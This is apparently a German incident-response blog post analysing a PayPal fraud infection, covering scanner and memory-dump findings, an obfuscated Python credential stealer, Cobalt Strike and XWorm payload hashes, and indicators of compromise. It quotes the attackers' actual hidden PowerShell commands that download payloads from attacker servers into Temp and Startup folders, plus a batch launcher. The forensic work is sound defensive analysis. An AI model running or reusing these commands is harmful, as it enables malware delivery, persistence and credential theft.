{"id":64107,"date":"2026-03-22T17:03:24","date_gmt":"2026-03-22T16:03:24","guid":{"rendered":"https:\/\/www.secuinfra.com\/news\/von-svchoss-bis-payday\/"},"modified":"2026-03-23T13:52:36","modified_gmt":"2026-03-23T12:52:36","slug":"von-svchoss-bis-payday","status":"publish","type":"post","link":"https:\/\/www.secuinfra.com\/de\/techtalk\/von-svchoss-bis-payday\/","title":{"rendered":"Von &#8217;svchoss&#8216; zu P(a)yday"},"content":{"rendered":"<div id=\"ez-toc-container\" class=\"ez-toc-v2_0_84 counter-flat ez-toc-counter ez-toc-white ez-toc-container-direction\">\n<div class=\"ez-toc-title-container\">\n<p class=\"ez-toc-title\" style=\"cursor:inherit\">[inhalt_uebersetzt]<\/p>\n<span class=\"ez-toc-title-toggle\"><\/span><\/div>\n<nav><ul class='ez-toc-list ez-toc-list-level-1 ' ><li class='ez-toc-page-1'><a class=\"ez-toc-link ez-toc-heading-1\" href=\"https:\/\/www.secuinfra.com\/de\/techtalk\/von-svchoss-bis-payday\/#Wichtigste_Ergebnisse\" >Wichtigste Ergebnisse<\/a><\/li><li class='ez-toc-page-1'><a class=\"ez-toc-link ez-toc-heading-2\" href=\"https:\/\/www.secuinfra.com\/de\/techtalk\/von-svchoss-bis-payday\/#Einfuehrung\" >Einf\u00fchrung<\/a><\/li><li class='ez-toc-page-1'><a class=\"ez-toc-link ez-toc-heading-3\" href=\"https:\/\/www.secuinfra.com\/de\/techtalk\/von-svchoss-bis-payday\/#Untersuchen_des_kompromittierten_Clients\" >Untersuchen des kompromittierten Clients<\/a><\/li><li class='ez-toc-page-1'><a class=\"ez-toc-link ez-toc-heading-4\" href=\"https:\/\/www.secuinfra.com\/de\/techtalk\/von-svchoss-bis-payday\/#Speicherauszugsanalyse\" >Speicherauszugsanalyse<\/a><\/li><li class='ez-toc-page-1'><a class=\"ez-toc-link ez-toc-heading-5\" href=\"https:\/\/www.secuinfra.com\/de\/techtalk\/von-svchoss-bis-payday\/#Fazit\" >Fazit<\/a><\/li><li class='ez-toc-page-1'><a class=\"ez-toc-link ez-toc-heading-6\" href=\"https:\/\/www.secuinfra.com\/de\/techtalk\/von-svchoss-bis-payday\/#Indicators_of_Compromise\" >Indicators of Compromise<\/a><\/li><\/ul><\/nav><\/div>\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Wichtigste_Ergebnisse\"><\/span>Wichtigste Ergebnisse  <span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Das SECUINFRA Falcon Team entdeckte w\u00e4hrend einer Betrugsuntersuchung eine unbekannte Python-Malware<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Die Angreifer setzten in gro\u00dfem Umfang Verschleierungstechniken und Einweg-Infrastrukturen ein<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Zus\u00e4tzlich zu der ma\u00dfgeschneiderten Malware wurden handels\u00fcbliche Angriffstools wie CobaltStrike verwendet<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Einfuehrung\"><\/span>Einf\u00fchrung  <span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Wachsamkeit und Vorsicht sind in der Cybersicherheit von entscheidender Bedeutung. Wenn wir diese Binsenweisheit wiederholen, denken die meisten von uns an Social-Engineering-Angriffe und daran, den Benutzern beizubringen, wie sie eine Phishing-E-Mail oder einen Betrugsanruf erkennen k\u00f6nnen. Ein aufmerksamer Benutzer kann jedoch auch wertvolle Erkenntnisse zu einem eher technischen Aspekt liefern.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Ein k\u00fcrzlich aufgetretener Vorfall wurde gemeldet, als der Benutzer \u201eseltsame schwarze Fenster\u201d auf dem Desktop bemerkte und Screenshots davon machte. Dies ging einher mit PayPal-\u00dcberweisungen vom Konto des Benutzers, die nicht von diesem autorisiert worden waren.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1099\" height=\"466\" src=\"https:\/\/www.secuinfra.com\/wp-content\/uploads\/1TT-1.png\" alt=\"\" class=\"wp-image-64093\" srcset=\"https:\/\/www.secuinfra.com\/wp-content\/uploads\/1TT-1.png 1099w, https:\/\/www.secuinfra.com\/wp-content\/uploads\/1TT-1-800x339.png 800w, https:\/\/www.secuinfra.com\/wp-content\/uploads\/1TT-1-768x326.png 768w\" sizes=\"(max-width: 1099px) 100vw, 1099px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><em>Abbildung 1: Vom Opfer aufgenommener Screenshot, Konsolenausgabe deutet auf Dekodierung und Ausf\u00fchrung der Nutzlast hin<\/em><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Offensichtlich wurde auf dem Computer ein Skript ausgef\u00fchrt. Die Ausgabe h\u00e4tte mit dem Befehl \u201eecho off\u201d unterdr\u00fcckt werden m\u00fcssen. Aufgrund eines Problems im Skript wurde dem Befehl jedoch seltsame Zeichen vorangestellt, wodurch der Befehl nicht ausgef\u00fchrt werden konnte. Da die Screenshots erhalten wurden, k\u00f6nnen wir erkennen, dass offenbar eine Art Entschl\u00fcsselungsaktion und Injektion stattgefunden hat.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Untersuchen_des_kompromittierten_Clients\"><\/span>Untersuchen des kompromittierten Clients  <span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Wir untersuchten den Computer weiter, indem wir den THOR-Scanner ausf\u00fchrten, der uns zahlreiche Hinweise lieferte, um ein besseres Verst\u00e4ndnis der Kompromittierung zu erlangen.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Die Datei \u201eEventTraceLog BootPerfDiagLogger.etl\u201d enthielt zahlreiche Eintr\u00e4ge, die THOR zur weiteren Analyse extrahierte. Sie zeigten die folgende Befehlszeile:<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Befehlszeile: \u201eC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\u201d -WindowStyle Hidden -ExecutionPolicy Bypass -NoProfile -c \u201e$ProgressPreference=\u201aSilentlyContinue\u2018; try { iwr \u201ahttp:\/\/43.156.63[.]124\/svchoss.exe\u2018 -OutFile \u201aC:\\Users\\admin\\AppData\\Local\\Temp\\svchoss.exe\u2018 -ErrorAction Stop; exit 0 } catch { exit 1 }&#8220;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Dieser Code verwendet PowerShell, um die Datei \u201esvchoss.exe\u201d von der IP-Adresse 43.156.63[.]124 herunterzuladen und in einem Temp-Verzeichnis zu speichern. THOR erkannte diesen Dateinamen als homomorphen Missbrauch, d. h.: Er versuchte, svchost.exe zu imitieren, um unentdeckt zu bleiben.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Die IP-Adresse, von der die Datei heruntergeladen wird, ist Teil des autonomen Systems AS 132203 mit der Bezeichnung \u201eTencent Building, Kejizhongyi Avenue\u201d, was darauf hindeutet, dass das chinesische Unternehmen Tencent an dem Angriff beteiligt ist. Die IP-Adresse wurde mit zahlreichen aktuellen Angriffen in Verbindung gebracht.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Tencent ist nicht nur ein bekanntes chinesisches Multimedia-Unternehmen, sondern aufgrund seines Standorts auch ein beliebter Ort f\u00fcr das Hosting von C2-Infrastrukturen, insbesondere f\u00fcr chinesische Angreifer.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Dar\u00fcber hinaus wies THOR uns auf eine Reihe verd\u00e4chtiger .bat- und .vbs-Dateien hin:<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">C:\\Users\\admin\\AppData\\Roaming\\nuil.bat<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">C:\\Users\\admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\12.bat<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">C:\\Users\\admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\esae.bat<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">C:\\Users\\admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\rech.bat<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">C:\\Users\\admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\esae.vbs<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Die entsprechenden Ereignisse hatten Zeitstempel vom selben Tag wie die Screenshots.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Speicherauszugsanalyse\"><\/span>Speicherauszugsanalyse  <span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Wir haben diese Ergebnisse mit einer Analyse des Speicherauszugs, den wir vom Kunden erhalten haben, weiterverfolgt. Mit Volatility 3 haben wir mit den \u00fcblichen Modulen begonnen.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Pstree, psxview, dlllist, ldr_modules, suspended_threads und cmdscan. Leider ohne gro\u00dfen Erfolg. Wir fanden jedoch einen angehaltenen Explorer-Thread mit der TID 8812. Dieser k\u00f6nnte, wie im Screenshot zu sehen, mit dem Vorfall in Verbindung stehen, war jedoch nur ein schwacher Hinweis.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Die Ausf\u00fchrung von Strings64.exe auf dem Speicherauszug und die Suche nach Zeichenfolgen mit mehr als 5 Zeichen ergab mehr als 2 Gigabyte an Zeichenfolgen.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Eine Zeichenfolgen-Suche nach den folgenden IOCs, die wir bisher von THOR erhalten hatten:<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u00b7 svchoss<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u00b7 python<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u00b7 43.156.63.124<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u00b7 esae.vbs<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u00b7 nuil.bat<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u00b7 12.bat<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u00b7 esae.bat<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u00b7 rech.bat<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u00b7 we.bin<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u00b7 a.txt<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u00b7 x.txt<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u00b7 xro.py<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u00b7 SystemCache25<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">ergab \u00fcber 5000 Ergebnisse. Es war klar, dass wir diese Zahl eingrenzen mussten. Treffer wie<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u00b7 Wikipedia.txt<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u00b7 Nvida.txt<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u00b7 index.txt<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">wurden entfernt<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Sofort auff\u00e4llig waren die Zeilen<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -NoProfile -c $ProgressPreference=\u201aSilentlyContinue\u2018; try { iwr &#8218;http:\/\/43.156.63[.] 124\/svchoss.exe&#8216; -OutFile \u201aC:\\Users\\admin\\AppData\\Local\\Temp\\svchoss.exe\u2018 -ErrorAction Stop; exit 0 } catch { exit 1 }<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">HostApplication=powershell -WindowStyle Hidden -c iwr \u201ahttp:\/\/43.156.63[.]124\/esae.vbs\u2018 -OutFile \u201e$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\esae.vbs\u201c<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">HostApplication=powershell -Command Invoke-WebRequest -Uri \u201ahttps:\/\/syracuse-seeks-wilson-row.trycloudflare[.]com\/of\/extracted\/12.bat\u2018 -OutFile \u201aC:\\Users\\admin\\AppData\\Local\\Temp\\12.bat\u2018<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">HostApplication=powershell -Command Invoke-WebRequest -Uri \u201ahttps:\/\/syracuse-seeks-wilson-row.trycloudflare[.]com\/of\/extracted\/rech.bat\u2018 -OutFile \u201aC:\\Users\\admin\\AppData\\Local\\Temp\\rech.bat\u2018<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">http:\/\/msedge.b.tlu.dl.delivery.mp.microsoft[.]com\/filestreamingservice\/files\\rech.bat&#8216;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">set DIR=%LOCALAPPDATA%\\Microsoft\\SystemCache25<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">if exist \u201e%DIR%\\xro.py\u201c (<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">if exist \u201e%DIR%\\we.bin\u201c (<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">if exist \u201e%DIR%\\x.txt\u201c (<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">python xro.py -i vue.bin -k o.txt<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">HostApplication=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -Command Copy-Item \u201a\\\\syracuse-seeks-wilson-row.trycloudflare[.]com@SSL\\davwwwroot\\nuil.bat\u2018 &#8218;C:\\Users\\admin\\AppData\\Roaming\\nuil.bat&#8216;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Wir haben nicht nur das Vorhandensein des im Screenshot abgebildeten Codes best\u00e4tigt, sondern auch weitere IOCs generiert und die Sch\u00e4dlichkeit der von THOR gefundenen .bat- und .vbs-Dateien best\u00e4tigt. Der Code deutet darauf hin, dass der b\u00f6swillige Akteur eine Python-Installation im Verzeichnis %LOCALAPPDATA%\\Microsoft\\SystemCache25 bereitgestellt hat.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Der Host syracuse-seeks-wilson-row.trycloudflare[.]com war zum Zeitpunkt der Untersuchung nicht mehr erreichbar. Die Domain trycloudflare[.]com ist legitim und Teil von Cloudflare.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">msedge.b.tlu.dl.delivery.mp.microsoft[.]com wird von Fastly.Inc gehostet. Der Eintrag wurde zuletzt am Tag des Vorfalls aktualisiert. Die URL gab einen 403-Fehler aus, als wir versuchten, die .bat-Datei herunterzuladen. Die Domain geh\u00f6rt zu Microsoft. Angesichts der Natur dieser Domain handelt es sich h\u00f6chstwahrscheinlich um eine Ablenkung f\u00fcr Ermittler und nicht um eine tats\u00e4chliche zweite Stufe. Die Cloudflare-Domain ist Teil eines anhaltenden Trends unter Bedrohungsakteuren, legitime Cloud-Dienste f\u00fcr C2 und die Bereitstellung von Payloads zu nutzen.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Dar\u00fcber hinaus konnten wir aus dem Prozessspeicher unverf\u00e4lschte Beispiele des Screenshot-Codes extrahieren:<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u00ef\u00bb\u00bf@echo off<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">set DIR=%LOCALAPPDATA%\\Microsoft\\SystemCache25<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">if exist \u201e%DIR%\\python.exe\u201c (<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">if exist \u201e%DIR%\\xro.py\u201c (<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">if exist \u201e%DIR%\\we.bin\u201c (<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">if exist \u201e%DIR%\\x.txt\u201c (<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">cd \/d \u201e%DIR%\u201c<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">python xro.py -i we.bin -k a.txt<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">)<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">)<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">)<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Leider war es nicht eindeutig mit einem bestimmten Prozess verbunden.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Die Suche nach bekannten Dateinamen in Prozess-Handles und Dateinamen ergab einige Treffer f\u00fcr<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\\Device\\HarddiskVolume3\\Users\\admin\\AppData\\Local\\Microsoft\\SystemCache25<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\\Users\\admin\\AppData\\Local\\Microsoft\\SystemCache25<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Und sogar \\Users\\admin\\AppData\\Local\\Microsoft\\SystemCache25\\python.exe<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Die einzigen Prozesse, die noch mit einem Handle zum Ordner SystemCache25 liefen, waren jedoch zwei Instanzen von explorer.exe. Die mit den Dateien SystemCache25 und python.exe verbundenen Prozesse waren bereits beendet, als das Image aufgenommen wurde.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Die folgenden Dateinamen wurden ebenfalls identifiziert, was uns weitere Einblicke in die Python-Installation in SystemCache25 verschaffte:<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Device\\HarddiskVolume3\\Users\\admin\\AppData\\Local\\Microsoft\\SystemCache25\\_ctypes.pyd<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Device\\HarddiskVolume3\\Users\\admin\\AppData\\Local\\Microsoft\\SystemCache25\\libffi-8.dll<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Device\\HarddiskVolume3\\Users\\admin\\AppData\\Local\\Microsoft\\SystemCache25\\python3.dll<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Device\\HarddiskVolume3\\Users\\admin\\AppData\\Local\\Microsoft\\SystemCache25\\python.exe<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Device\\HarddiskVolume3\\Users\\admin\\AppData\\Local\\Microsoft\\SystemCache25\\_zstd.pyd<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Device\\HarddiskVolume3\\Users\\admin\\AppData\\Local\\ Microsoft\\SystemCache25\\_lzma.pyd<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Device\\HarddiskVolume3\\Users\\admin\\AppData\\Local\\Microsoft\\SystemCache25\\_bz2.pyd<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Device\\HarddiskVolume3\\Users\\admin\\AppData\\Local\\Microsoft\\SystemCache25\\libffi-8.dll<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Ger\u00e4t\\Festplattenlaufwerk3\\Benutzer\\admin\\AppData\\Local\\Microsoft\\SystemCache25\\_ctypes.pyd<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Ger\u00e4t\\Festplattenlaufwerk3\\Benutzer\\admin\\AppData\\Local\\Microsoft\\SystemCache25\\vcruntime140.dll<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Device\\HarddiskVolume3\\Users\\admin\\AppData\\Local\\Microsoft\\SystemCache25\\python315.dll<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">admin@file:\/\/\/C:\/Users\/admin\/AppData\/Local\/Microsoft\/SystemCache25\/x.txt<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\\Device\\HarddiskVolume3\\Users\\admin\\AppData\\Local\\Microsoft\\SystemCache25<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">An dieser Stelle h\u00e4tten wir normalerweise mit der Untersuchung der Artefakte auf der Festplatte des Systems begonnen. Leider war es nicht m\u00f6glich, eine Triage oder ein Image von der Festplatte des Systems zu erstellen. Stattdessen haben wir uns auf die IP-Adresse 43.156.63[.]124 konzentriert, die wir als Zeichenfolge im Speicher gefunden hatten. Wir konnten einige der dort gehosteten Payloads identifizieren und extrahieren:<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">vs.exe<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">a57a08802002bb2e67f33143a17e027d07022e2aa3743840c8f18ced2c2b5217<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">eine Art Shellcode-Loader?<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">012.exe<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">7a58c3106c38dbd56dda242deac02eea9bef8f064e62e6435849048fd036ceb1<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">XWorm RAT v5.6<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">2.4.exe<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">3d9239e8ed6b4f29f5754c934749110491ba821c31d758c2bc3e571c1375798a<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">HTran Tunneling Tool<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">02.08.2022.exe<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">40ef98e3251741b57792a42246eb238c4c12936d2db00bef2b8389b834ce7b52<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Cobalt Strike Beacon<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">svchoss.exe<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">3483344d12e26ceb42c9c63d1d941c5309dd34d37ecb449922ef85647b726f58<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">PyInstaller Malware<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">esae.vbs war leider nicht unter diesen Beispielen.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Dar\u00fcber hinaus werden mehrere Dienste wie FTP, MySQL und CobaltStrike Team Server auf diesem System gehostet.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Abuse.ch Threatfox listet mehrere Eintr\u00e4ge von TCP-Ports auf, die mit CS- und Empire-Aktivit\u00e4ten in Verbindung stehen:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" width=\"570\" height=\"532\" src=\"https:\/\/www.secuinfra.com\/wp-content\/uploads\/svchoss_02-1.png\" alt=\"\" class=\"wp-image-64094\"\/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Die Ausf\u00fchrung von 02.08.2022.exe durch den Cobalt Strike Parser von Sentinel-one best\u00e4tigte, dass es sich um einen Cobalt Strike Beacon handelt. Die IP-Adresse f\u00fcr den C2-Server ist identisch mit der Adresse, unter der der Beacon gehostet wird.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" width=\"908\" height=\"362\" src=\"https:\/\/www.secuinfra.com\/wp-content\/uploads\/svchoss_03.png\" alt=\"\" class=\"wp-image-64095\" srcset=\"https:\/\/www.secuinfra.com\/wp-content\/uploads\/svchoss_03.png 908w, https:\/\/www.secuinfra.com\/wp-content\/uploads\/svchoss_03-800x319.png 800w, https:\/\/www.secuinfra.com\/wp-content\/uploads\/svchoss_03-768x306.png 768w\" sizes=\"(max-width: 908px) 100vw, 908px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Da svchoss.exe zumindest denselben Namen wie die auf den kompromittierten Computer heruntergeladene Datei hat, konzentrierten wir uns bei unseren weiteren Untersuchungen auf diese Datei. Die Datei war VirusTotal seit dem 05. Dezember 2025 bekannt, wobei 41 von 71 Engines sie als b\u00f6sartig erkannt hatten. https:\/\/www.virustotal.com\/gui\/file\/3483344d12e26ceb42c9c63d1d941c5309dd34d37ecb449922ef85647b726f58\/details<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"908\" height=\"138\" src=\"https:\/\/www.secuinfra.com\/wp-content\/uploads\/svchoss_04.png\" alt=\"\" class=\"wp-image-64096\" srcset=\"https:\/\/www.secuinfra.com\/wp-content\/uploads\/svchoss_04.png 908w, https:\/\/www.secuinfra.com\/wp-content\/uploads\/svchoss_04-800x122.png 800w, https:\/\/www.secuinfra.com\/wp-content\/uploads\/svchoss_04-768x117.png 768w\" sizes=\"(max-width: 908px) 100vw, 908px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Wir haben in der .exe-Datei mehrere Zeichenfolgen gefunden, die sich auf Python und Kryptographie-Module Wir haben mehrere Zeichenfolgen in der EXE-Datei gefunden, die sich auf Python und Kryptografie-Module von Python beziehen. VirusTotal zeigte auch den Zugriff auf mehrere Dateien in<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u00b7 C:\\Users\\&lt;USER&gt;\\AppData\\Local\\Chromium\\User Data\\AutofillStates\\<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u00b7 C:\\Users\\&lt;USER&gt;\\AppData\\Local\\48e7a6ba7f72710ae085ed2aae203bf1\\&lt;USER&gt;@DESKTOP-ET51AJO_en-US\\Wallets\\Edge_Wallet\\Edge_Exodus\\<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u00b7 C:\\Users\\&lt;USER&gt;\\AppData\\Local\\48e7a6ba7f72710ae085ed2aae203bf1\\&lt;USER&gt;@DESKTOP-ET51AJO_en-US\\Browsers\\Mozilla\\Firefox\\<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">unter anderem. Dies deutet darauf hin, dass es sich tats\u00e4chlich um einen Credential Stealer handelt.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Wir haben den Inhalt dieser Datei mit dem Tool pyinstxtractor-ng extrahiert.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Das Skript identifizierte die Python-Version als 314 und die folgenden m\u00f6glichen Einstiegspunkte:<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u00b7 pyiboot01_bootstrap.py<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u00b7 pyi_rth_inspect.py<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u00b7 pyi_rth_pkgutil.pyc<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u00b7 pyi_rth_multiprocessing.pyc<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u00b7 pyi_rth_setuptools.pyc<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u00b7 test_expert_silent_temp.pyc<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Die folgenden Dateien wurden extrahiert:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"908\" height=\"254\" src=\"https:\/\/www.secuinfra.com\/wp-content\/uploads\/svchoss_05.png\" alt=\"\" class=\"wp-image-64097\" srcset=\"https:\/\/www.secuinfra.com\/wp-content\/uploads\/svchoss_05.png 908w, https:\/\/www.secuinfra.com\/wp-content\/uploads\/svchoss_05-800x224.png 800w, https:\/\/www.secuinfra.com\/wp-content\/uploads\/svchoss_05-768x215.png 768w\" sizes=\"(max-width: 908px) 100vw, 908px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Die Extraktion von PYZ.pyz schlug fehl. Weitere auff\u00e4llige Dateien waren:<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u00b7 python314.dll<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u00b7 der Ordner pyarmor_runtime_011117<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Die Datei python314.dll war vorhanden, um Analyse-Tools mit einer falschen Versionsnummer zu verwirren. Die Verwendung von pyarmor wurde durch das Vorhandensein des zugeh\u00f6rigen Ordners impliziert.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Die Datei test_expert_silent_temp.pyc war sofort verd\u00e4chtig, da es sich nicht um eine regul\u00e4re Python-Datei handelt. Wir haben versucht, sie mit uncompyle6 zu dekompilieren. Diese Datei sowie alle anderen Dateien hatten die unbekannte magic number 3627. Wir haben sie durch A7 0D 0D 0A f\u00fcr Python 3.11 (3495) ersetzt. Danach schlug die Extraktion immer noch fehl, was bei Vorhandensein von Pyarmor zu erwarten war.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Bisher haben wir die folgenden Verschleierungstechniken entdeckt:<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u00b7 falsche Python-Versionsnummer<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u00b7 anderer Dateiname (test_expert_silent_temp.pyc)<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u00b7 falsches Magic Byte<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u00b7 Pyarmor<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Fazit\"><\/span>Fazit<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Unsere Untersuchung best\u00e4tigte die sch\u00e4dliche Pr\u00e4senz auf dem Computer und generierte weitere IOCs. THOR erwies sich dabei als gro\u00dfe Hilfe, da es uns einen ersten Ansatzpunkt und Zeichenfolgen f\u00fcr die Suche im Systemspeicher lieferte. Ohne eine vollst\u00e4ndige Systemuntersuchung konnten wir den Vorfall nicht vollst\u00e4ndig rekonstruieren und die Beziehungen zwischen den verschiedenen Datenpunkten herstellen.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Wir konnten den urspr\u00fcnglichen Zugriffsvektor nicht rekonstruieren. Da es sich um einen regul\u00e4ren Endpunkt handelte, der infiziert wurde, ist es sehr 